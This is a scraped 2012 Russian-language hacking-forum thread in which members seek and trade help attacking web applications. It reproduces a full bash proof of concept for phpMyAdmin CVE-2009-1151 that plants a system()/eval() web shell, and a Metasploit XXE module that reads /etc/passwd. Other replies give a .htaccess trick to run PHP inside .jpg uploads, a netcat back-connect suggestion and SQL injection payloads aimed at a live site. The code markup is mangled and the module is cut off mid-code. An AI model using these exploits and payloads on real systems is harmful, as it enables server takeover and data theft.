ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.07.2012, 20:58
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме:
11466
Репутация:
3
|
|
Подскажите что за эксплоит\уязвимость рассматривается в этом видео _http://www.youtube.com/watch?v=-t5xWuCYhlw
Спасибо!
|
|
|
30.07.2012, 21:24
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
Провел на форуме:
44130
Репутация:
26
|
|
Сообщение от WendM
Подскажите что за эксплоит\уязвимость рассматривается в этом видео _http://www.youtube.com/watch?v=-t5xWuCYhlw
Спасибо!
CVE-2009-1151 phpMyAdmin 'setup.php' PHP Code Injection Vulnerability
/showpost.php?p=1330014&postcount=13
|
|
|
|
31.07.2012, 02:47
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Nightmarе
Возникла такая ситуация.
Могу на сайт заливать любые файлы, но PHP код не выполняется, пишет ошибку 500, я пробовал .htaccess с содержимым:
allow from all
я пробовал возможные расширения типа php4 php5 phtml но всё одинаково 500, из чего я сделал вывод, что проблема в том, что файлы скажем заливаются с правами 644, а для запуска скрипта надо 755, права я поменять не могу...
заливал и SSI шелл с расширением shtml но команды не пашут (отключен видимо).
Какие варианты можно ещё попробовать кроме тех о которых я написал?
Ты как шелл заливаешь: через форму аплоада, через выполнение кода?
Если есть возможность выполнить код, то можно попробовать сделать коннект или бек через nc и посмотреть что там немудрено.
|
|
|
|
31.07.2012, 08:27
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме:
11466
Репутация:
3
|
|
Добрый день. Разъясните пожалуйста по поводу вот этого эксплоита
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
* Date: Tue, 09 Jun 2009 14:13:34 GMT
*/
/* Servers configuration */
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]/* Server (config:root) [1] */
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]++;
[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"]]){echo
[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"]]);echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];}if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]){echo
[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];eval([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]);echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];};[/COLOR][COLOR="#FF8000"]//'] = 'localhost';
[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'extension'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'mysqli'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'connect_type'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'tcp'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'compress'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'auth_type'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'config'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]/* End of servers configuration */
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Где в данном коде нужно указать ссылку на уязвимый phpmyadmin?
И еще, чем запускать данный эксплоит?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)
# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
[/COLOR][COLOR="#007700"]if [[ $[/COLOR][COLOR="#FF8000"]# -ne 1 ]]
[/COLOR][COLOR="#0000BB"]then
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"usage: ./$(basename $0) "
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
[/COLOR][COLOR="#007700"]exit
[/COLOR][COLOR="#0000BB"]fi
[/COLOR][COLOR="#007700"]if ![/COLOR][COLOR="#0000BB"]which curl[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null
then
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"sorry but you need curl for this script to work!"
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"on Debian/Ubuntu: sudo apt-get install curl"
[/COLOR][COLOR="#007700"]exit
[/COLOR][COLOR="#0000BB"]fi
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]exploit[/COLOR][COLOR="#007700"]{
[/COLOR][COLOR="#0000BB"]postdata[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"token=$1&action=save&configuration="[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22h ost%27]="[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22conne ct_type%22%3bs:3:"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth _type%22%3bs:6:"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b} }}&eoltype=unix"
[/COLOR][COLOR="#0000BB"]postdata2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"token=$1&action=save&configuration=a:1:"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host %27%5d="[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cp re%3e%27%3b"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3be val"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%2 2%3bs:8:"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:% 22config"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
[/COLOR][COLOR="#0000BB"]flag[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"/tmp/$(basename $0).[/COLOR][COLOR="#0000BB"]$RANDOM[/COLOR][COLOR="#DD0000"].phpinfo.flag.html"
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] attempting to inject phpinfo() ..."
[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$postdata[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/scripts/setup.php"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null
[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/config/config.inc.php"[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]grep[/COLOR][COLOR="#DD0000"]"phpinfo()"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null
then
curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/config/config.inc.php"[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$flag
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] success! phpinfo() injected successfully! output saved on[/COLOR][COLOR="#0000BB"]$flag[/COLOR][COLOR="#DD0000"]"
[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]d $postdata2[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/scripts/setup.php"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]" $3/config/config.inc.php?c=ls+-l+/"
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]" $3/config/config.inc.php?p=phpinfo();"
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]" please send any feedback/improvements for this script to"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"unknown.pentestergmail.com"
[/COLOR][COLOR="#007700"]else
echo[/COLOR][COLOR="#DD0000"]"[+] no luck injecting to $3/config/config.inc.php :("
[/COLOR][COLOR="#007700"]exit
[/COLOR][COLOR="#0000BB"]fi
[/COLOR][COLOR="#007700"]}
[/COLOR][COLOR="#FF8000"]# end of exploit function
[/COLOR][COLOR="#0000BB"]cookiejar[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"/tmp/$(basename $0).[/COLOR][COLOR="#0000BB"]$RANDOM[/COLOR][COLOR="#DD0000"].txt"
[/COLOR][COLOR="#0000BB"]token[/COLOR][COLOR="#007700"]=`[/COLOR][COLOR="#DD0000"]curl -ks -c[/COLOR][COLOR="#0000BB"]$cookiejar[/COLOR][COLOR="#DD0000"]--url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12[/COLOR][COLOR="#007700"]`
echo[/COLOR][COLOR="#DD0000"]"[+] checking if phpMyAdmin exists on URL provided ..."
[/COLOR][COLOR="#FF8000"]#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]grep phpMyAdmin $cookiejar[/COLOR][COLOR="#007700"]&>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null
then
length[/COLOR][COLOR="#007700"]=`[/COLOR][COLOR="#DD0000"]echo -n[/COLOR][COLOR="#0000BB"]$token[/COLOR][COLOR="#DD0000"]| wc -c[/COLOR][COLOR="#007700"]`
[/COLOR][COLOR="#FF8000"]# valid form token obtained?
[/COLOR][COLOR="#007700"]if [[[/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]eq 32[/COLOR][COLOR="#007700"]]]
[/COLOR][COLOR="#0000BB"]then
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] phpMyAdmin cookie and form token received successfully. Good!"
[/COLOR][COLOR="#FF8000"]# attempt exploit!
[/COLOR][COLOR="#0000BB"]exploit $token $cookiejar[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]1
[/COLOR][COLOR="#007700"]else
echo[/COLOR][COLOR="#DD0000"]"[+] could not grab form token. you might want to try exploiting the vuln manually :("
[/COLOR][COLOR="#007700"]exit
[/COLOR][COLOR="#0000BB"]fi
[/COLOR][COLOR="#007700"]else
echo[/COLOR][COLOR="#DD0000"]"[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
[/COLOR][COLOR="#007700"]exit
[/COLOR][COLOR="#0000BB"]fi
[/COLOR][COLOR="#FF8000"]# milw0rm.com [2009-06-09][/COLOR][/COLOR]
С нетерпением жду ответа! Спасибо! |
|
|
|
31.07.2012, 10:55
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
Провел на форуме:
44130
Репутация:
26
|
|
Сообщение от Nightmarе
Возникла такая ситуация.
Могу на сайт заливать любые файлы, но PHP код не выполняется, пишет ошибку 500, я пробовал .htaccess с содержимым:
allow from all
я пробовал возможные расширения типа php4 php5 phtml но всё одинаково 500, из чего я сделал вывод, что проблема в том, что файлы скажем заливаются с правами 644, а для запуска скрипта надо 755, права я поменять не могу...
заливал и SSI шелл с расширением shtml но команды не пашут (отключен видимо).
Какие варианты можно ещё попробовать кроме тех о которых я написал?
Для исполнения, права 755 должны быть у 'cgi' скриптов (Perl, etc), а для PHP скриптов достаточно только чтения в т.ч. 644.
Пробовал такой .htaccess?
Код:
php_flag engine on
AddType application/x-httpd-php .jpg
Сообщение от WendM
И еще, чем запускать данный эксплоит?
Данный эксплоит нужно запускать из командной строки Linux, *nix т.к. написан на Bash.
Перейдя по этой ссылке можно увидеть пример запуска.
|
|
|
|
31.07.2012, 14:29
|
|
Участник форума
Регистрация: 08.01.2012
Сообщений: 129
Провел на форуме:
28549
Репутация:
6
|
|
Добрый день. Возникла такая ситуация.
http://site.ru/homepage.php?page=4&userid=1
начал пробовать вот так
/homepage.php?page=4&userid=1'+order+by+10/*
Сообщение от None
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and make_public = 'Y' order by priority, title limit 10' at line 3, occured in query: "select * from bcs_wishlist,bcs_product where bcs_wishlist.product_id = bcs_product.product_id and userid = '1' order by 10/*' and make_public = 'Y' order by priority, title limit 10".
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' order by bwcore_member.username limit 5' at line 4, occured in query: "select bwcore_member.username,bwcore_member.avatar_url,bc s_fav_vendor.* from bcs_fav_vendor,bwcore_member where bwcore_member.userid = bcs_fav_vendor.userid_vendor and bcs_fav_vendor.userid = '1' order by 10/*' order by bwcore_member.username limit 5".
/homepage.php?page=4&userid=1' GROUP BY 10 --
Сообщение от None
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Y' order by priority, title limit 10' at line 2, occured in query: "select * from bcs_wishlist,bcs_product where bcs_wishlist.product_id = bcs_product.product_id and userid = '1' GROUP BY 10 --' and make_public = 'Y' order by priority, title limit 10".
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by bwcore_member.username limit 5' at line 3, occured in query: "select bwcore_member.username,bwcore_member.avatar_url,bc s_fav_vendor.* from bcs_fav_vendor,bwcore_member where bwcore_member.userid = bcs_fav_vendor.userid_vendor and bcs_fav_vendor.userid = '1' GROUP BY 10 --' order by bwcore_member.username limit 5".
Что я не так делаю? |
|
|
|
31.07.2012, 15:08
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Gaben7
Добрый день. Возникла такая ситуация.
http://site.ru/homepage.php?page=4&userid=1
начал пробовать вот так
/homepage.php?page=4&userid=1'+order+by+10/*
/homepage.php?page=4&userid=1' GROUP BY 10 --
Что я не так делаю?
не ставишь в конце пробел или он вырезается.
Д и крутить тут наверное ток как error-based, хотя может и выведет инфу по первому запросу.
|
|
|
|
01.08.2012, 07:00
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Gaben7
/homepage.php?page=4&userid=1' GROUP BY 10 --
Что я не так делаю?
Попробуй вот так:
Код:
/homepage.php?page=4&userid=1' union select 1,2,3,4,5 and 1='1
(подбирай кол-во полей в union практическим путём
или так
Код:
/homepage.php?page=4&userid=1' or @:=(@:=1)||@ group by concat((select @@version),!@)having@||min(@:=0) and 1='1
|
|
|
|
01.08.2012, 09:07
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме:
11466
Репутация:
3
|
|
Добрый день. Возник вопрос по этому эксплоиту
phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection
PHP код:
[COLOR="#000000"]require 'msf/core'
class Metasploit3 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
'Version' => '1.0',
'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
The attacker must be logged in to MySQL via phpMyAdmin.
Works on Windows and Linux Versions 3.3.X and 3.4.X},
'References' =>
[
[ 'CVE', '2011-4107' ],
[ 'OSVDB', '76798' ],
[ 'BID', '50497' ],
[ 'URL', 'http://secforce.com/research/'],
],
'Author' => [ 'Marco Batista' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
OptString.new('USER', [ true, "Username", 'root']),
OptString.new('PASS', [ false, "Password", 'password']),
OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
],self.class)
end
def loginprocess
# HTTP GET TO GET SESSION VALUES
getresponse = send_request_cgi({
'uri' => datastore['APP']+'/index.php',
'method' => 'GET',
'version' => '1.1',
}, 25)
if (getresponse.nil?)
print_error("no response for #{ip}:#{rport}")
elsif (getresponse.code == 200)
print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
print_status("Received 302 to #{getresponse.headers['Location']}")
else
print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
end
valuesget = getresponse.headers["Set-Cookie"]
varsget = valuesget.split(" ")
#GETTING THE VARIABLES NEEDED
phpMyAdmin = varsget.grep(/phpMyAdmin/).last
pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
# END HTTP GET
# LOGIN POST REQUEST TO GET COOKIE VALUE
postresponse = send_request_cgi({
'uri' => datastore['APP']+'/index.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Content-Type' => 'application/x-www-form-urlencoded',
'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
},
'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
}, 25)
if (postresponse["Location"].nil?)
print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
else
tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
end
valuespost = postresponse.headers["Set-Cookie"]
varspost = valuespost.split(" ")
#GETTING THE VARIABLES NEEDED
pmaUser = varspost.grep(/pmaUser-1/).last
pmaPass = varspost.grep(/pmaPass-1/).last
return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
# END OF LOGIN POST REQUEST
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
print_error(e.message)
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
print_error(e.message)
end
def readfile(cookie,tokenvalue)
#READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
getfiles = send_request_cgi({
'uri' => datastore['APP']+'/export.php',
'method' => 'POST',
'version' => '1.1',
'headers' =>{
'Cookie' => cookie
},
'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
}, 25)
if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
print_error("Error reading the file... not enough privilege? login error?")
else
print_status("#{getfiles.body}")
end
end
def dropdatabase(cookie,tokenvalue)
dropdb = send_request_cgi({
'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
'method' => 'GET',
'version' => '1.1',
'headers' =>{
'Cookie' => cookie
},
}, 25)
print_status("Dropping database: "+datastore['DB'])
end
def run
cookie,tokenvalue = loginprocess()
print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")
craftedXML = "------WebKitFormBoundary3XPL01T\n"
craftedXML \n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]]>\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]&conteudo;\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n\n"
[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]datastore[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'APP'[/COLOR][COLOR="#007700"]]+[/COLOR][COLOR="#DD0000"]'/import.php'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'method'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'version'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'1.1'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'headers'[/COLOR][COLOR="#007700"]=>{
[/COLOR][COLOR="#DD0000"]'Content-Type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'Cookie'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]cookie
[/COLOR][COLOR="#007700"]},
[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]craftedXML
[/COLOR][COLOR="#007700"]},[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tokenvalue[/COLOR][COLOR="#007700"])
if ([/COLOR][COLOR="#0000BB"]datastore[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DROP'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"true"[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]dropdatabase[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tokenvalue[/COLOR][COLOR="#007700"])
else
